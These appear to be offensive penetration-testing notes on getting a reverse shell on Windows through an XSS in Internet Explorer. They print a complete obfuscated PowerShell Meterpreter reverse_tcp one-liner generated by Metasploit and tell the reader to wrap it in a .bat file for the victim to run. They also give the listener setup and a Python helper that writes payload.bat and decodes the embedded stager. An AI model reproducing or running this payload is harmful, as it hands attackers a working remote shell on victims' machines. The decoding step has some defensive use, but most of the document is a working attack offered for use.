Open shell via XSS (Internet Explorer)

Even better, have the payload open a reverse connection back to a Metasploit handler. The one-liner below is generated with the psexec_psh module's DryRun option, which prints the PowerShell command the module would run on the target instead of executing it over SMB, so only the payload's LHOST and LPORT matter here, not RHOST or the SMB credentials.

 > show options

Module options (exploit/windows/smb/psexec_psh):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   DryRun                true             no        Prints the powershell command that would be used
   RHOST                 192.168.21.1     yes       The target address
   RPORT                 445              yes       Set the SMB service port
   SERVICE_DESCRIPTION                    no        Service description to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBDomain             WORKGROUP        no        The Windows domain to use for authentication
   SMBPass                                no        The password for the specified username
   SMBUser                                no        The username to authenticate as


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.71     yes       The listen address
   LPORT     4445             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic




 > exploit

[*] Started reverse handler on 192.168.1.71:4445
[+] "%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAB8HPlYCA7VWa4/aOBT9PJX6H6IKiUSlJDB0XlKldYDwGGCAQBigqPIkTvDgxEzi8Or2v+8NhHlsZ3a7u9oIFD/utY/PPdc3bhzYgvJACidjPyhK39+/O+niEPuSnInEwG4a56c5KWNX1ka/ehFaZ8rJCZhkvGK130GrJkZC+iLJU7RcVriPaTC7uirHYUgCcejna0SgKCL+HaMkkhXpd2k0JyH5dHN3T2whfZcy3/I1xu8wS822ZWzPifQJBU4y1+I2ThDmzSWjQs5+/ZpVpp8Ks3z1IcYskrPmNhLEzzuMZRXph5JsONguiZxtUzvkEXdFfkSD02J+GETYJR1YbUXaRMy5E2UVOAz8QiLiMJCeHytZ52AlZ6HZDbmNHCckETjlG8GKL4icCWLGctJv8jQF0Y8DQX0C84KEfGmScEVtEuXrOHAY6RN3JnfI+nj2X3WSnzuBVVeESg4C9DbaNndiRg4LZJWf8T7GVoHnZXyBkR/v371/5x6V4XxbPJcFtE6m+zYBuHKXR3Rv9kXSclIbdsSCh1voZgZhTJSZNE2iMZ3NpAzZrvWgtXQuqv1l7u11CkenxKXZ1DowNrU4dWbgkwYss9oYVNNZ+axwt59/W4AV4tKAVLYB9ql91Jj8WhyIy8j+zPmjWQfQydl0gjgVwoiHRUJpTpr+7Fb1qXj01WPKHBIiG2IZASoIs/ISzCFKcrYRtIkPpB36WYiHC8omR+tUzdvj7kkfjLJlhqMoJ3VjSC07J5kEM+LkJBRENJ1CseD7ZvYJbjtmgto4EsflZsqf+Uz3LfMgEmFsQzyBg4G5JDbFLKEkJ9WpQ/StSb3j/tlXCSljxmjgwUorCAiMJESYIlFJCFBfKELJm0Q0/CUjPtjuc95g2IMMTxNkLy/sESf7FuJjBhzknnB0JOcZXgi8ybjISRYNBVwhCd97mf03PM9ukRfIyiFJYyYfU2uqb0WSERk/2BSLcSLflLo9UaEAkoyQ+zqOyFnJFCFQKH9Qb2gZwTNuBKxt6wtaQGtaaLThP6SnDV45d66b93U1rGzmLmpEjXa9W+nV66VV07RKwqw2xHW3IdrV2/t7E9X7w7GYNFB9QLXFuLRbNunObCFnvFHPdvpuremb3b3nuOOK63rnrtkvfDZoa1Tu6VoRtyrVuDXS17pWiqp0Xe/RYW/RNMTd2GJ46KrebeES000rvLcKvL1rIFSbn9q7pmvV5m1nO66rl6PSAlURKgdVy9D59VgPUVe1sGfx9bWn94teGemGQ8mkNzT0Xs/Q0bB2/1C5VD3wvcVzfWQV6WR5259D3wAI16pWajhkx8c9IKnGEfb6YOOVi/bcBZvKR6R/7PCoiBc6RzrYGJMHwDVeGl0G84NhkSOLdW4xak22hqoWxt0Sqmt0VPNQsiT29B5G0aqyq6gFy+HO6HNn7KrWLTtXK+XB0nZVVV3XK9f2pLC5uDkv6dpD2ac+uys66uXwQg/gZN2V5/RG5/1NZ3sH+w1V1fqQqAfkk4njZrF+WhysmKU/08Rb5aGNw2iOGWgFLvxjMhs8NNKLu8tp4iHLaWlfkDAgDOogVMqj9hFj3E5qSXLJQxk7FJcZ5PIQmqfFV1uK9GioPNWW49DV1QRgQi4dxJ1vkcAT85y2OdU0qBDapqTBgX/9cGW+3MrpYrmkxrzg6Wkftt9HSfIr49eD2rpZE/j/pjFN7jm8nL+h8WnsL2Z/iVot95KCn6ZfDvwjtv8FByNMBdiacEkxcqior1KRiufZ18hjmEAdbvokH4g3sfjUgS+VPwAotmIxnQoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"

The .bat file you get the victim to execute contains the command above with the surrounding double quotes removed. The dry run prints the command in Ruby's quoted and escaped string form, so the doubled backslashes in the syswow64\WindowsPowerShell\v1.0 path are escaping too and should be single backslashes in the file. The one-liner deliberately switches to the 32-bit powershell.exe on a 64-bit host ([IntPtr]::Size is 4 only in a 32-bit process), which matches the x86 windows/meterpreter/reverse_tcp payload selected above. The dry run returns as soon as it has printed the command, so make sure a handler is actually listening when the victim runs the file: `use exploit/multi/handler`, `set PAYLOAD windows/meterpreter/reverse_tcp`, `set LHOST 192.168.1.71`, `set LPORT 4445`, `exploit -j`.
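As an added example, not part of the original notes: a small Python helper that takes the `[+] "..."` line DryRun prints, undoes the Ruby string quoting, and produces the .bat body, and that also pulls the gzip+base64 blob out of the command and decompresses it so you can read what the inner powershell.exe actually executes (the same unwrapping works when you find such a one-liner on a host during an investigation). It assumes the line is in Ruby's inspect form, wrapped in double quotes with backslashes doubled, as in the output above. The inner script in the sample is a constructed stand-in, not the real Meterpreter stager, so the script can be exercised offline.

```python
"""Unwrap a psexec_psh DryRun line into a .bat body and the script the stager runs.

Added example, not part of the original notes. Assumes the DryRun line is Ruby's
inspect() rendering of the command (wrapped in double quotes, backslashes doubled).
"""
import base64
import gzip
import re
import sys

# The gzip+base64 blob sits inside FromBase64String(''...''); the doubled single
# quotes are PowerShell's escape for a quote inside a single-quoted string.
_BLOB_RE = re.compile(r"FromBase64String\(''([A-Za-z0-9+/=]+)''\)")


def dryrun_to_bat(line: str) -> str:
    """Turn the `[+] "..."` line printed by DryRun into the contents of the .bat file."""
    line = line.strip()
    if line.startswith("[+]"):
        line = line[3:].lstrip()
    if len(line) < 2 or line[0] != '"' or line[-1] != '"':
        raise ValueError("expected the command wrapped in double quotes")
    # Undo Ruby string escaping: \\ -> \ and \" -> " (the only escapes that occur here).
    cmd = re.sub(r'\\(["\\])', r"\1", line[1:-1])
    return cmd + "\r\n"  # one command per line, CRLF line ending for cmd.exe


def extract_stager(cmd: str) -> str:
    """Return the PowerShell that the inner 32-bit powershell.exe decodes and IEXes."""
    m = _BLOB_RE.search(cmd)
    if m is None:
        raise ValueError("no FromBase64String blob in command")
    return gzip.decompress(base64.b64decode(m.group(1))).decode("utf-8")


# Constructed sample: a harmless stand-in for the real Meterpreter stager.
SAMPLE_INNER = "Write-Host 'inner script (constructed sample, not the real stager)'"


def build_dryrun_line(inner_ps: str) -> str:
    """Build a DryRun-style line around inner_ps, mirroring the shape of the real one:
    cmd.exe -> hidden powershell -> 32-bit powershell -> MemoryStream/GzipStream/IEX."""
    blob = base64.b64encode(gzip.compress(inner_ps.encode("utf-8"))).decode("ascii")
    ps = (
        "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else"
        "{$b=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'};"
        "$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;"
        "$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,"
        "[Convert]::FromBase64String(''" + blob + "''));IEX (New-Object "
        "IO.StreamReader(New-Object IO.Compression.GzipStream($s,"
        "[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';"
        "$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;"
        "$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;"
        "$p=[System.Diagnostics.Process]::Start($s);"
    )
    cmd = "%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c " + ps
    # Ruby inspect(): double every backslash, escape double quotes, wrap in quotes.
    escaped = cmd.replace("\\", "\\\\").replace('"', '\\"')
    return '[+] "' + escaped + '"'


if __name__ == "__main__":
    # Usage: paste the [+] "..." line on stdin; the .bat body is written to
    # payload.bat and the decoded inner script is printed to stderr for review.
    bat = dryrun_to_bat(sys.stdin.read())
    with open("payload.bat", "w", newline="") as fh:
        fh.write(bat)
    sys.stderr.write(extract_stager(bat) + "\n")
```

Feed the real `[+] "..."` line from the dry run above on stdin and you get payload.bat with the quoting undone, plus the decoded stager on stderr; `dryrun_to_bat` refuses input that is not wrapped in double quotes, which catches the case where the module printed the raw command instead of the inspect form.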